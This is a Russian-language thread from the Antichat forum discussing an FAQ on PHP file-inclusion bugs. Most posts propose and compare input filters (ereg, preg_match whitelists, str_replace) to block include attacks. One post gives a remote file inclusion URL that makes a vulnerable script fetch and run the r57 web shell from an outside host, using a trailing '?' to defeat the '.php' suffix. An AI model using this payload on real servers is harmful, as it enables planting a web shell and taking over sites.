Форум АНТИЧАТ - Комментарии к FAQ PHP Including

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Комментарии к FAQ PHP Including (https://forum.antichat.xyz/showthread.php?t=18371)

Комментарии к FAQ PHP Including

Почему-то тема (http://forum.antichat.ru/thread18368.html) оказалась закрытой. Предположительно, это вызванно желанием не засорять ее чужими комментами. Потому предлогаю обсудить ее здесь.

Лично мне хотелось бы высказать свое уважение автору, указать ему на одну несущественную ошибку и немного дополнить FAQ.

Ошибка находится здесь:

Код:

<?

if(file_exists($page))

include "/files/$page";

?>

понятно, что если файл $page существует, то это совершенно не говорит о том, что файл /files/$page существует.
Я бы написал так:

Код:

<?

$page = "../../files/$page.php";

if(file_exists($page))

include $page;

?>

По поводу дополнения - тут есть 2 момента.
1) относительно 0-байтов. Очень часто этот символ фильтруется если и не скриптом, то самим апачем.
Потому имеет смысл обращатся к бажному скрипту

Код:

<?

include "$page.php";

?>

таким образом:
http://site.com/include.php?page=http://rst.void.ru/download/r57shell.txt?

В результате скрипт попытается инклудить
http://rst.void.ru/download/r57shell.txt?.php, то есть ".php" превратится в параметр в http-запросе и не станет нам мешать.
2) относительно фильтрации
наиболее выгодно использовать функцию ereg(). например:

Код:

<?php

if(isset($_GET["page"]))

{

$page = $_GET["page"];

if(ereg("^[a-z]{1,10}$", $page))

  @include "../../files/$page.php";

else

  die("<a href=\"http://www.fbi.gov\">HACK OFF!</a>");

}

?>

То есть, если параметр page соответствует регулярному выражению "строка длинной от 1 до 10 символов, состоящая из строчных букв", то скрипт примет ее, иначе пошлет недохакера на www.fbi.gov. Кроме того, символ "@" перед include заставит апач не выводить сообщение об ошибке в случае, если соответствующий файл не будет найлен.

Ну вот я и высказался, надеюсь мои слова не будут восприняты как упрек, но зато будут восприняты, как желание дополнить материал.

Тема закрыта была, для того чтобы не засорять её. уже получил 2 материала по дополнению, всё будет дополнено и исправлено. всем спасибо

свои комменты скинул коту в личку. А насчет твоих... Что-то мне слабо верится что обработка строки регулярными выражениями более эффективно, чем просто отброс лишних сиволов обычным str_replace() ;)

Trinux
Ты о том, сколько ресурсов тратится?
Я х3. Но могу сказать, что обработка php-сценариев в целом вобще ресурсоемкая задача и насколько она сравнима с ereg() я не в состоянии ответить.

Все равно str_replace работает быстрее рег выражения в php
будь то ereg,preg_match и т.д.

Тем не менее мое мнение - все равно, даже если на str_replace тратится 0.01 секунды, а на ereg() 0.1, то нам с вами нет до этого никакого дела )

Цитата:

Сообщение от drmist

если у тебя сайт с низкой посещаемостью - то пофиг, а если нет - то... траблы с хостером... с мощностью сервера. время в 0.1 секунду - приличное время

Цитата:

Я говорил впринипе. Если ты такую защиту воткнешь на rbc.ru, на котором 200к хостов в день, то эта, казалось бы, незначительная разница перерастет в значительную.
А обработка php не столь ресурсоемкий процесс, если грамотно повесить php на сервак.

Кстати, знает кто-нить разницу между ereg() и preg_match()? =))

Код:

if (!empty($_GET['go']) && preg_match("#^[a-z0-9_]{2,20}$#", $_GET['go']) && file_exists("modules/".$_GET['go']."/index.php")) {

    $module = $_GET['go'];

    include("modules/".$module."/index.php");

}

Юзаем этот код и все ок - include баг уже не прокатит. Кто не согласен - отписываемся, открываем мне глаза :)))